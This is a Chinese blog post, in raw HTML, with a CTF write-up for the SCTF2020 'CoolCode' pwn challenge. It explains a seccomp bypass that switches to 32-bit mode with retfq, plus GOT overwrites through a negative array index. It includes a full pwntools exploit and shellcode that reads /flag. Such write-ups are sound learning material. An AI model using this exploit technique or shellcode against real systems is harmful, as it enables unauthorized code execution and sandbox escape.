<!DOCTYPE html><html><head><title> 从SCTF2020_CoolCode中学习open禁用的seccomp绕过 &middot; Surager</title><!-- Begin Jekyll SEO tag v2.7.1 --><meta name="generator" content="Jekyll v4.1.1" /><meta property="og:title" content="从SCTF2020_CoolCode中学习open禁用的seccomp绕过" /><meta property="og:locale" content="en_US" /><meta name="description" content="seccomp禁用execve和open的情况 一般会留一个5号系统调用。 0004: 0x15 0x01 0x00 0x00000005 if (A == fstat) goto 0006 在64位运行模式下的sys_fstat，在32位运行模式下是sys_open。 解决方案是利用shellcoderetfq进行模式转换。retfq相当于jmp rsp的同时mov cs,[rsp+0x8]。cs寄存器中0x23表示32位运行模式，0x33表示64位运行模式。在写shellcode的时候在栈中布置好即可。 程序分析 文件保护机制 $ file ./CoolCode ./CoolCode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=63ae47b78d82eb9066b985cd3daf02452cd65895, stripped $ checksec ./CoolCode [*] &#39;/home/surgaer/work/CoolCode&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 几乎只开了canary，疯狂暗示。 但是没有这么简单，直接给了一个seccomp，禁用一大堆。只剩了write、read、mmap和fstat。 ================================= 0000: 0x20 0x00 0x00 0x00000000 A = sys_number 0001: 0x15 0x04 0x00 0x00000001 if (A == write) goto 0006 0002: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0006 0003: 0x15 0x02 0x00 0x00000009 if (A == mmap) goto 0006 0004: 0x15 0x01 0x00 0x00000005 if (A == fstat) goto 0006 0005: 0x06 0x00 0x00 0x00050005 return ERRNO(5) 0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0007: 0x06 0x00 0x00 0x00000000 return KILL 参考师傅们的WP，解决方案是利用retfq切换机器运行模式到32位。 32位的系统调用5 : sys_open，64位系统调用5 : sys_fstat。 向chunk中输入信息时有信息检测，需要是数字或者大写字母。 if ( waf(s, v8) ) { puts(&quot;read error.&quot;); exit(1); } strncpy(dest, s, v8); ... } signed __int64 __fastcall waf(__int64 a1, int a2) { int i; // [rsp+14h] [rbp-8h] for ( i = 0; i &lt; a2 - 1; ++i ) { if ( (*(i + a1) &lt;= 0x2F || *(i + a1) &gt; 0x39) &amp;&amp; (*(i + a1) &lt;= 0x40 || *(i + a1) &gt; 0x5A) ) return 1LL; } return 0LL; } 而可以利用add函数没有下界检测，可以输入负数覆盖got表的漏洞进行解决。解决方案是将exit_got改成ret。从而绕过检测。 add(-22,&#39;\xc3&#39;) # asm(&#39;ret&#39;) 再覆盖free_got为shellcode_read，获得大量的字符输入权。 shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite free_got 这样就可以写任意的字符了，但是由于strncpy函数的存在，&quot;\x00&quot;还是不行。况且我们并没有足够的字节数进行shellcode的写入。解决方案是将write_got写成read，就可以用show函数进行写了。 shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite write_got show(0) 此时我们只需向两个位置写入shellcode，再用retfq进行一个跳转即可。 shellcode3 = &#39;&#39;&#39; xor rdi,rdi mov rsi,0x602300 mov rdx,0x200 xor rax,rax syscall xor rdi,rdi xor rax,rax mov rsi,0x602400 mov rdx,0x200 syscall push 0x23 push 0x602308 retfq &#39;&#39;&#39; padding = &#39;a&#39;*0x20+p64(0)+p64(0x31) payload = padding*2+asm(shellcode3,arch=&#39;amd64&#39;) io.sendline(payload) free(2) flag = &#39;/flag\x00\x00\x00&#39; shellcode_open = &#39;&#39;&#39; xor eax,eax mov eax,0x5 mov ebx,0x602300 mov ecx,0 int 0x80 jmp 0x33:0x602400 ret &#39;&#39;&#39; shellcode_write = &#39;&#39;&#39; mov rdi,3 mov rsi,0x602500 mov rdx,0x200 xor rax,rax syscall mov rax,1 mov rdi,1 mov rsi,0x602500 mov rdx,0x200 syscall ret &#39;&#39;&#39; io.sendline(flag+asm(shellcode_open,arch=&#39;i386&#39;)) io.sendline(asm(shellcode_write,arch=&#39;amd64&#39;)) 思路 覆盖exit_got成ret，获得字符输入权限。 覆盖free_got为shellcode_read，获得大量的字符输入权。 覆盖write_got成shellcode_read，获得随机字符随机字符数输入权限。 将free_got上的指针所指chunk内容覆盖为shellcode_read，读入两段shellcode并且完成运行模式的转换。 发送shellcode，完成orw。 exp from pwn import * io = process(&quot;./CoolCode&quot;) #io = remote(&quot;&quot;) elf = ELF(&quot;./CoolCode&quot;) libc = ELF(&quot;./x64-libc-2.23.so&quot;) #context.log_level = &#39;debug&#39; def add(idx,con): io.sendlineafter(&quot; Your choice :&quot;,&#39;1&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) io.sendafter(&quot;messages:&quot;,con) def free(idx): io.sendlineafter(&quot; Your choice :&quot;,&#39;3&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) def show(idx): io.sendlineafter(&quot; Your choice :&quot;,&#39;2&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) def dbg(): gdb.attach(io) pause() breakpoint = &#39;&#39;&#39; define fn b *0x400E61 b *0x400EF5 end fn &#39;&#39;&#39; #gdb.attach(io,breakpoint) add(-22,&#39;\xc3&#39;) # asm(&#39;ret&#39;) shellcode1 = &#39;&#39;&#39; mov rsi,rdi mov rdx,rdi xor rdi,rdi xor rax,rax syscall ret &#39;&#39;&#39; add(0,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-37,asm(shellcode1,arch=&#39;amd64&#39;)) # overwrite exit_got shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite write_got show(0) shellcode3 = &#39;&#39;&#39; xor rdi,rdi mov rsi,0x602300 mov rdx,0x200 xor rax,rax syscall xor rdi,rdi xor rax,rax mov rsi,0x602400 mov rdx,0x200 syscall push 0x23 push 0x602308 retfq &#39;&#39;&#39; padding = &#39;a&#39;*0x20+p64(0)+p64(0x31) payload = padding*2+asm(shellcode3,arch=&#39;amd64&#39;) io.sendline(payload) free(2) flag = &#39;/flag\x00\x00\x00&#39; shellcode_open = &#39;&#39;&#39; xor eax,eax mov eax,0x5 mov ebx,0x602300 mov ecx,0 int 0x80 jmp 0x33:0x602400 ret &#39;&#39;&#39; shellcode_write = &#39;&#39;&#39; mov rdi,3 mov rsi,0x602500 mov rdx,0x200 xor rax,rax syscall mov rax,1 mov rdi,1 mov rsi,0x602500 mov rdx,0x200 syscall ret &#39;&#39;&#39; io.sendline(flag+asm(shellcode_open,arch=&#39;i386&#39;)) #pause() io.sendline(asm(shellcode_write,arch=&#39;amd64&#39;)) io.interactive() 参考W&amp;M战队WP SCTF2020 Writeup By W&amp;M（PWN和Crypto部分） 总结 一开始这一题没有思路，原因可能是跳过了checksec的环节导致RWX以及NX没有发现，进而无法得到程序的控制流。 其次是shellcode的编写。通过这一题对自己的shellcode的编写能力有了一定的提升。 最后，在比赛上我总是怂的一批。记住，在比赛时一定不要怂。" /><meta property="og:description" content="seccomp禁用execve和open的情况 一般会留一个5号系统调用。 0004: 0x15 0x01 0x00 0x00000005 if (A == fstat) goto 0006 在64位运行模式下的sys_fstat，在32位运行模式下是sys_open。 解决方案是利用shellcoderetfq进行模式转换。retfq相当于jmp rsp的同时mov cs,[rsp+0x8]。cs寄存器中0x23表示32位运行模式，0x33表示64位运行模式。在写shellcode的时候在栈中布置好即可。 程序分析 文件保护机制 $ file ./CoolCode ./CoolCode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=63ae47b78d82eb9066b985cd3daf02452cd65895, stripped $ checksec ./CoolCode [*] &#39;/home/surgaer/work/CoolCode&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 几乎只开了canary，疯狂暗示。 但是没有这么简单，直接给了一个seccomp，禁用一大堆。只剩了write、read、mmap和fstat。 ================================= 0000: 0x20 0x00 0x00 0x00000000 A = sys_number 0001: 0x15 0x04 0x00 0x00000001 if (A == write) goto 0006 0002: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0006 0003: 0x15 0x02 0x00 0x00000009 if (A == mmap) goto 0006 0004: 0x15 0x01 0x00 0x00000005 if (A == fstat) goto 0006 0005: 0x06 0x00 0x00 0x00050005 return ERRNO(5) 0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0007: 0x06 0x00 0x00 0x00000000 return KILL 参考师傅们的WP，解决方案是利用retfq切换机器运行模式到32位。 32位的系统调用5 : sys_open，64位系统调用5 : sys_fstat。 向chunk中输入信息时有信息检测，需要是数字或者大写字母。 if ( waf(s, v8) ) { puts(&quot;read error.&quot;); exit(1); } strncpy(dest, s, v8); ... } signed __int64 __fastcall waf(__int64 a1, int a2) { int i; // [rsp+14h] [rbp-8h] for ( i = 0; i &lt; a2 - 1; ++i ) { if ( (*(i + a1) &lt;= 0x2F || *(i + a1) &gt; 0x39) &amp;&amp; (*(i + a1) &lt;= 0x40 || *(i + a1) &gt; 0x5A) ) return 1LL; } return 0LL; } 而可以利用add函数没有下界检测，可以输入负数覆盖got表的漏洞进行解决。解决方案是将exit_got改成ret。从而绕过检测。 add(-22,&#39;\xc3&#39;) # asm(&#39;ret&#39;) 再覆盖free_got为shellcode_read，获得大量的字符输入权。 shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite free_got 这样就可以写任意的字符了，但是由于strncpy函数的存在，&quot;\x00&quot;还是不行。况且我们并没有足够的字节数进行shellcode的写入。解决方案是将write_got写成read，就可以用show函数进行写了。 shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite write_got show(0) 此时我们只需向两个位置写入shellcode，再用retfq进行一个跳转即可。 shellcode3 = &#39;&#39;&#39; xor rdi,rdi mov rsi,0x602300 mov rdx,0x200 xor rax,rax syscall xor rdi,rdi xor rax,rax mov rsi,0x602400 mov rdx,0x200 syscall push 0x23 push 0x602308 retfq &#39;&#39;&#39; padding = &#39;a&#39;*0x20+p64(0)+p64(0x31) payload = padding*2+asm(shellcode3,arch=&#39;amd64&#39;) io.sendline(payload) free(2) flag = &#39;/flag\x00\x00\x00&#39; shellcode_open = &#39;&#39;&#39; xor eax,eax mov eax,0x5 mov ebx,0x602300 mov ecx,0 int 0x80 jmp 0x33:0x602400 ret &#39;&#39;&#39; shellcode_write = &#39;&#39;&#39; mov rdi,3 mov rsi,0x602500 mov rdx,0x200 xor rax,rax syscall mov rax,1 mov rdi,1 mov rsi,0x602500 mov rdx,0x200 syscall ret &#39;&#39;&#39; io.sendline(flag+asm(shellcode_open,arch=&#39;i386&#39;)) io.sendline(asm(shellcode_write,arch=&#39;amd64&#39;)) 思路 覆盖exit_got成ret，获得字符输入权限。 覆盖free_got为shellcode_read，获得大量的字符输入权。 覆盖write_got成shellcode_read，获得随机字符随机字符数输入权限。 将free_got上的指针所指chunk内容覆盖为shellcode_read，读入两段shellcode并且完成运行模式的转换。 发送shellcode，完成orw。 exp from pwn import * io = process(&quot;./CoolCode&quot;) #io = remote(&quot;&quot;) elf = ELF(&quot;./CoolCode&quot;) libc = ELF(&quot;./x64-libc-2.23.so&quot;) #context.log_level = &#39;debug&#39; def add(idx,con): io.sendlineafter(&quot; Your choice :&quot;,&#39;1&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) io.sendafter(&quot;messages:&quot;,con) def free(idx): io.sendlineafter(&quot; Your choice :&quot;,&#39;3&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) def show(idx): io.sendlineafter(&quot; Your choice :&quot;,&#39;2&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) def dbg(): gdb.attach(io) pause() breakpoint = &#39;&#39;&#39; define fn b *0x400E61 b *0x400EF5 end fn &#39;&#39;&#39; #gdb.attach(io,breakpoint) add(-22,&#39;\xc3&#39;) # asm(&#39;ret&#39;) shellcode1 = &#39;&#39;&#39; mov rsi,rdi mov rdx,rdi xor rdi,rdi xor rax,rax syscall ret &#39;&#39;&#39; add(0,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-37,asm(shellcode1,arch=&#39;amd64&#39;)) # overwrite exit_got shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite write_got show(0) shellcode3 = &#39;&#39;&#39; xor rdi,rdi mov rsi,0x602300 mov rdx,0x200 xor rax,rax syscall xor rdi,rdi xor rax,rax mov rsi,0x602400 mov rdx,0x200 syscall push 0x23 push 0x602308 retfq &#39;&#39;&#39; padding = &#39;a&#39;*0x20+p64(0)+p64(0x31) payload = padding*2+asm(shellcode3,arch=&#39;amd64&#39;) io.sendline(payload) free(2) flag = &#39;/flag\x00\x00\x00&#39; shellcode_open = &#39;&#39;&#39; xor eax,eax mov eax,0x5 mov ebx,0x602300 mov ecx,0 int 0x80 jmp 0x33:0x602400 ret &#39;&#39;&#39; shellcode_write = &#39;&#39;&#39; mov rdi,3 mov rsi,0x602500 mov rdx,0x200 xor rax,rax syscall mov rax,1 mov rdi,1 mov rsi,0x602500 mov rdx,0x200 syscall ret &#39;&#39;&#39; io.sendline(flag+asm(shellcode_open,arch=&#39;i386&#39;)) #pause() io.sendline(asm(shellcode_write,arch=&#39;amd64&#39;)) io.interactive() 参考W&amp;M战队WP SCTF2020 Writeup By W&amp;M（PWN和Crypto部分） 总结 一开始这一题没有思路，原因可能是跳过了checksec的环节导致RWX以及NX没有发现，进而无法得到程序的控制流。 其次是shellcode的编写。通过这一题对自己的shellcode的编写能力有了一定的提升。 最后，在比赛上我总是怂的一批。记住，在比赛时一定不要怂。" /><link rel="canonical" href="https://surager.github.io/_posts/2020-07-08-%E4%BB%8ESCTF2020_CoolCode%E4%B8%AD%E5%AD%A6%E4%B9%A0open%E7%A6%81%E7%94%A8%E7%9A%84seccomp%E7%BB%95%E8%BF%87/" /><meta property="og:url" content="https://surager.github.io/_posts/2020-07-08-%E4%BB%8ESCTF2020_CoolCode%E4%B8%AD%E5%AD%A6%E4%B9%A0open%E7%A6%81%E7%94%A8%E7%9A%84seccomp%E7%BB%95%E8%BF%87/" /><meta property="og:site_name" content="Surager" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-07-08T00:00:00+08:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="从SCTF2020_CoolCode中学习open禁用的seccomp绕过" /><meta name="google-site-verification" content="YIKi1rBnyUaS-DMYiluseI5kZzTwjCkTFmKkSkMZDJk" /><meta name="baidu-site-verification" content="szbTSfUGAB" /> <script type="application/ld+json"> {"url":"https://surager.github.io/_posts/2020-07-08-%E4%BB%8ESCTF2020_CoolCode%E4%B8%AD%E5%AD%A6%E4%B9%A0open%E7%A6%81%E7%94%A8%E7%9A%84seccomp%E7%BB%95%E8%BF%87/","headline":"从SCTF2020_CoolCode中学习open禁用的seccomp绕过","datePublished":"2020-07-08T00:00:00+08:00","dateModified":"2020-07-08T00:00:00+08:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://surager.github.io/_posts/2020-07-08-%E4%BB%8ESCTF2020_CoolCode%E4%B8%AD%E5%AD%A6%E4%B9%A0open%E7%A6%81%E7%94%A8%E7%9A%84seccomp%E7%BB%95%E8%BF%87/"},"description":"seccomp禁用execve和open的情况 一般会留一个5号系统调用。 0004: 0x15 0x01 0x00 0x00000005 if (A == fstat) goto 0006 在64位运行模式下的sys_fstat，在32位运行模式下是sys_open。 解决方案是利用shellcoderetfq进行模式转换。retfq相当于jmp rsp的同时mov cs,[rsp+0x8]。cs寄存器中0x23表示32位运行模式，0x33表示64位运行模式。在写shellcode的时候在栈中布置好即可。 程序分析 文件保护机制 $ file ./CoolCode ./CoolCode: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=63ae47b78d82eb9066b985cd3daf02452cd65895, stripped $ checksec ./CoolCode [*] &#39;/home/surgaer/work/CoolCode&#39; Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 几乎只开了canary，疯狂暗示。 但是没有这么简单，直接给了一个seccomp，禁用一大堆。只剩了write、read、mmap和fstat。 ================================= 0000: 0x20 0x00 0x00 0x00000000 A = sys_number 0001: 0x15 0x04 0x00 0x00000001 if (A == write) goto 0006 0002: 0x15 0x03 0x00 0x00000000 if (A == read) goto 0006 0003: 0x15 0x02 0x00 0x00000009 if (A == mmap) goto 0006 0004: 0x15 0x01 0x00 0x00000005 if (A == fstat) goto 0006 0005: 0x06 0x00 0x00 0x00050005 return ERRNO(5) 0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0007: 0x06 0x00 0x00 0x00000000 return KILL 参考师傅们的WP，解决方案是利用retfq切换机器运行模式到32位。 32位的系统调用5 : sys_open，64位系统调用5 : sys_fstat。 向chunk中输入信息时有信息检测，需要是数字或者大写字母。 if ( waf(s, v8) ) { puts(&quot;read error.&quot;); exit(1); } strncpy(dest, s, v8); ... } signed __int64 __fastcall waf(__int64 a1, int a2) { int i; // [rsp+14h] [rbp-8h] for ( i = 0; i &lt; a2 - 1; ++i ) { if ( (*(i + a1) &lt;= 0x2F || *(i + a1) &gt; 0x39) &amp;&amp; (*(i + a1) &lt;= 0x40 || *(i + a1) &gt; 0x5A) ) return 1LL; } return 0LL; } 而可以利用add函数没有下界检测，可以输入负数覆盖got表的漏洞进行解决。解决方案是将exit_got改成ret。从而绕过检测。 add(-22,&#39;\\xc3&#39;) # asm(&#39;ret&#39;) 再覆盖free_got为shellcode_read，获得大量的字符输入权。 shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite free_got 这样就可以写任意的字符了，但是由于strncpy函数的存在，&quot;\\x00&quot;还是不行。况且我们并没有足够的字节数进行shellcode的写入。解决方案是将write_got写成read，就可以用show函数进行写了。 shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite write_got show(0) 此时我们只需向两个位置写入shellcode，再用retfq进行一个跳转即可。 shellcode3 = &#39;&#39;&#39; xor rdi,rdi mov rsi,0x602300 mov rdx,0x200 xor rax,rax syscall xor rdi,rdi xor rax,rax mov rsi,0x602400 mov rdx,0x200 syscall push 0x23 push 0x602308 retfq &#39;&#39;&#39; padding = &#39;a&#39;*0x20+p64(0)+p64(0x31) payload = padding*2+asm(shellcode3,arch=&#39;amd64&#39;) io.sendline(payload) free(2) flag = &#39;/flag\\x00\\x00\\x00&#39; shellcode_open = &#39;&#39;&#39; xor eax,eax mov eax,0x5 mov ebx,0x602300 mov ecx,0 int 0x80 jmp 0x33:0x602400 ret &#39;&#39;&#39; shellcode_write = &#39;&#39;&#39; mov rdi,3 mov rsi,0x602500 mov rdx,0x200 xor rax,rax syscall mov rax,1 mov rdi,1 mov rsi,0x602500 mov rdx,0x200 syscall ret &#39;&#39;&#39; io.sendline(flag+asm(shellcode_open,arch=&#39;i386&#39;)) io.sendline(asm(shellcode_write,arch=&#39;amd64&#39;)) 思路 覆盖exit_got成ret，获得字符输入权限。 覆盖free_got为shellcode_read，获得大量的字符输入权。 覆盖write_got成shellcode_read，获得随机字符随机字符数输入权限。 将free_got上的指针所指chunk内容覆盖为shellcode_read，读入两段shellcode并且完成运行模式的转换。 发送shellcode，完成orw。 exp from pwn import * io = process(&quot;./CoolCode&quot;) #io = remote(&quot;&quot;) elf = ELF(&quot;./CoolCode&quot;) libc = ELF(&quot;./x64-libc-2.23.so&quot;) #context.log_level = &#39;debug&#39; def add(idx,con): io.sendlineafter(&quot; Your choice :&quot;,&#39;1&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) io.sendafter(&quot;messages:&quot;,con) def free(idx): io.sendlineafter(&quot; Your choice :&quot;,&#39;3&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) def show(idx): io.sendlineafter(&quot; Your choice :&quot;,&#39;2&#39;) io.sendlineafter(&quot;Index:&quot;,str(idx)) def dbg(): gdb.attach(io) pause() breakpoint = &#39;&#39;&#39; define fn b *0x400E61 b *0x400EF5 end fn &#39;&#39;&#39; #gdb.attach(io,breakpoint) add(-22,&#39;\\xc3&#39;) # asm(&#39;ret&#39;) shellcode1 = &#39;&#39;&#39; mov rsi,rdi mov rdx,rdi xor rdi,rdi xor rax,rax syscall ret &#39;&#39;&#39; add(0,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-37,asm(shellcode1,arch=&#39;amd64&#39;)) # overwrite exit_got shellcode2 = &#39;&#39;&#39; dec rdi mov rdx,rsi mov rax,rdi syscall ret &#39;&#39;&#39; add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(1,&#39;1&#39;*8) add(-3,&#39;1&#39;*8) add(-34,asm(shellcode2,arch=&#39;amd64&#39;)) # overwrite write_got show(0) shellcode3 = &#39;&#39;&#39; xor rdi,rdi mov rsi,0x602300 mov rdx,0x200 xor rax,rax syscall xor rdi,rdi xor rax,rax mov rsi,0x602400 mov rdx,0x200 syscall push 0x23 push 0x602308 retfq &#39;&#39;&#39; padding = &#39;a&#39;*0x20+p64(0)+p64(0x31) payload = padding*2+asm(shellcode3,arch=&#39;amd64&#39;) io.sendline(payload) free(2) flag = &#39;/flag\\x00\\x00\\x00&#39; shellcode_open = &#39;&#39;&#39; xor eax,eax mov eax,0x5 mov ebx,0x602300 mov ecx,0 int 0x80 jmp 0x33:0x602400 ret &#39;&#39;&#39; shellcode_write = &#39;&#39;&#39; mov rdi,3 mov rsi,0x602500 mov rdx,0x200 xor rax,rax syscall mov rax,1 mov rdi,1 mov rsi,0x602500 mov rdx,0x200 syscall ret &#39;&#39;&#39; io.sendline(flag+asm(shellcode_open,arch=&#39;i386&#39;)) #pause() io.sendline(asm(shellcode_write,arch=&#39;amd64&#39;)) io.interactive() 参考W&amp;M战队WP SCTF2020 Writeup By W&amp;M（PWN和Crypto部分） 总结 一开始这一题没有思路，原因可能是跳过了checksec的环节导致RWX以及NX没有发现，进而无法得到程序的控制流。 其次是shellcode的编写。通过这一题对自己的shellcode的编写能力有了一定的提升。 最后，在比赛上我总是怂的一批。记住，在比赛时一定不要怂。","@type":"BlogPosting","@context":"https://schema.org"}</script> <!-- End Jekyll SEO tag --><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link rel="alternate" href="/feed.xml" title="Surager's blog" type="application/rss+xml" /><link rel="apple-touch-icon-precomposed" href="/static/assets/img/landing/avatar.jpg" /><link rel="shortcut icon" href="/static/assets/img/landing/avatar.jpg" /><link rel="stylesheet" href="https://cdn.jsdelivr.net/combine/gh/poole/lanyon@v1.1.0/public/css/poole.min.css,gh/poole/lanyon@v1.1.0/public/css/lanyon.min.css,gh/poole/lanyon@v1.1.0/public/css/syntax.min.css" /><link rel="stylesheet" href="/static/assets/script/admonitions.css" /> <script async="async" src="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/js/all.min.js" ></script> <script src='https://zz.bdstatic.com/linksubmit/push.js' async="async" ></script><style> .wrap { transition-property: width,background-size,transform; transition-duration: .3s; transition-timing-function: ease-in-out; min-height: 100%; display: inline-block; background-size: 100% auto; background-position: 0% 0%; background-repeat: no-repeat; background-attachment: fixed; background-image: url(/assets/image/74559485_p1.webp); } @media (min-aspect-ratio: 2400/1850) { .wrap { background-image: url(/assets/image/71932901_p0.webp); } } .sidebar-overlay #sidebar-checkbox:checked ~ .wrap { width: calc(100% - 14rem); background-size: calc(100% - 14rem) auto; transform: translateX(14rem); } .layout-reverse.sidebar-overlay #sidebar-checkbox:checked ~ .wrap { transform: translateX(0); }</style><style> .sidebar, html, h1, h2, h3, h4, h5, h6 { font-family: "Fira Code", Consolas, PingFang SC, Menlo, Monaco, "Courier New", Microsoft JhengHei, monospace; }</style><style> h1, h2, h3, h4, h5, h6 { font-weight: bold; }</style><style> .post h1, .post h2, .post h3, .post h4, .post h5, .post h6 { font-weight: 550; }</style><style> img { display: inline-block; margin: 0; }</style><style> ::-webkit-scrollbar { width: 3px; height: 3px; } ::-webkit-scrollbar-thumb { background-image: linear-gradient(45deg, Cyan 0%, Magenta 50%, Yellow 100%); }</style><style> ::selection { color: White; background: Black; }</style><body class="theme-base-07 sidebar-overlay"> <!-- Target for toggling the sidebar `.sidebar-checkbox` is for regular styles, `#sidebar-checkbox` for behavior. --> <input type="checkbox" class="sidebar-checkbox" id="sidebar-checkbox" /> <!-- Toggleable sidebar --><div class="sidebar" id="sidebar"><div class="sidebar-item"><div class="effect effect-right_to_left"> <img class="effect-img" src="/static/assets/img/landing/avatar.jpg" alt="img" /><div class="effect-info"> 19计算机专业在读<br/> Blue-Whale<br/> V&N<br/> 龙鸣PWN手<br/> 希望你能在这里学到东西<br/> <a href="mailto:surager2019@gmail.com"> <i class="fas fa-envelope"></i> </a> <a href="https://github.com/Surager"> <i class="fab fa-github"></i> </a> <a href="https://surager.pub/feed.xml"> <i class="fas fa-rss"></i> </a> <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=100% height=52 src="https://music.163.com/outchain/player?type=2&id=1453894413&auto=0&height=32" ></iframe></div></div></div><nav class="sidebar-nav"> <a class="sidebar-nav-item" href="/"> <i class="fas fa-home fa-fw"></i> 首页 </a> <a class="sidebar-nav-item" href="/comments/"> <i class="fas fa-comments fa-fw"></i> 留言 </a> <a class="sidebar-nav-item" href="/tags/"> <i class="fas fa-tags fa-fw"></i> 标签 </a> <a class="sidebar-nav-item" href="/archive/"> <i class="fas fa-archive fa-fw"></i> 归档 </a> <a class="sidebar-nav-item" href="/about/"> <i class="fas fa-address-card fa-fw"></i> 关于 </a></nav><div class="sidebar-item"><style> #sidebar-search-input { background: none; border: none; color: White; width: 100%; } #sidebar-search-results-container { overflow: auto auto; max-height: 66.6vh; }</style><input id="sidebar-search-input" placeholder="搜索博文" /><ol id="sidebar-search-results-container" ></ol><script src='https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.11/dest/simple-jekyll-search.min.js' async='async' onload=' SimpleJekyllSearch({ json: "/assets/simple-jekyll-search/search.json", searchInput: document.getElementById("sidebar-search-input"), resultsContainer: document.getElementById("sidebar-search-results-container"), searchResultTemplate: `<li><a href="{url}">{title}</a>`, limit: 999, fuzzy: true })' ></script><style> #toc { overflow: auto auto; max-height: 66.6vh; }</style><ol id="toc"><li><a href="#seccomp%E7%A6%81%E7%94%A8execve%E5%92%8Copen%E7%9A%84%E6%83%85%E5%86%B5">seccomp禁用execve和open的情况</a><li><a href="#%E7%A8%8B%E5%BA%8F%E5%88%86%E6%9E%90">程序分析</a><ol><li><a href="#%E6%80%9D%E8%B7%AF">思路</a><li><a href="#exp">exp</a></ol><li><a href="#%E6%80%BB%E7%BB%93">总结</a></ol><style> .sidebar-checkbox { display: none; } .sidebar-toggle { position: fixed; }</style><style> .sidebar { overflow: scroll; min-height: 101%; }</style><style> .effect { margin: 1rem; perspective: 900px; } .effect-info { text-align: center; backface-visibility: hidden; position: absolute; top: 0; transform-style: preserve-3d; } .effect-img { z-index: 11; width: 100%; height: 100%; position: relative; transition: all 0.5s ease-in-out; } .effect-img:before { position: absolute; display: block; } .effect-right_to_left .effect-img { transform-origin: 0% 50%; } .effect-right_to_left:hover .effect-img { transform: rotate3d(0, 1, 0, -180deg); }</style><div> <i class="fas fa-cog fa-spin 